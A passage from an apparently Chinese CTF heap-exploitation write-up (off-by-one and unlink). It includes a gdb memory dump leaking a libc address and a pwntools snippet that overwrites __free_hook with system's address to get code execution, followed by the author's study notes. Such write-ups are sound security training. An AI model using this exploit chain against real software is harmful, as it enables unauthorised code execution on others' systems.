0x5577f976f1d0: 0x0000000000000000 0x0000000000000201 0x5577f976f1e0: 0x00007f452ad38b78 0x00007f452ad38b78 #libc地址 0x5577f976f1f0: 0x0000000000000000 0x0000000000000000 0x5577f976f200: 0x0000000000000000 0x0000000000000000
这样就泄露了libc地址,那个固定偏移,也是利用vmmap查看,然后相减获得的
任意地址写
payload = p64(free_hook) + p64(0x200) edit(4, payload) edit(6, p64(system_addr)) io.success('first_heap: 0x%x' % first_heap) remove(6) #gdb.attach(io)
- edit(4,payload)这里将book6的description指针指向free_hook
- 然后edit是改成system地址,最后调用一次free就成了
## 课后小知识总结 - 在gdb中用find查找字符串,可以获得指定位置
- 堆块会复用,就是free过后的小堆块,在再次malloc后会用相同的堆块
- 在计算的时候可以以一个为基地址,这样好计算
- vmmap获得libc地址后,在相减获得固定偏移,适用于smallbin第一次free的chunk和mmap申请的堆块
- 具体情况具体分析,不要照搬照抄原版exp,有些是要改的,大佬们觉得简单可能就没注释了
## 总结 - 题目不难,但自己做确实有点难度,研究了好久
- 写这个入门的文章也挺难的,要自己懂点,有人带就好点了,希望有师傅可以带带我
- 要开学了,另一道题目下次在研究了,off-by-one另一道题目
- 这道题同时学习了unlink跟off-by-one
- 我一定会出这个系列的文章的,坚持就是胜利(我对我自己说的,hh)
文章来源: http://xz.aliyun.com/t/6087
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh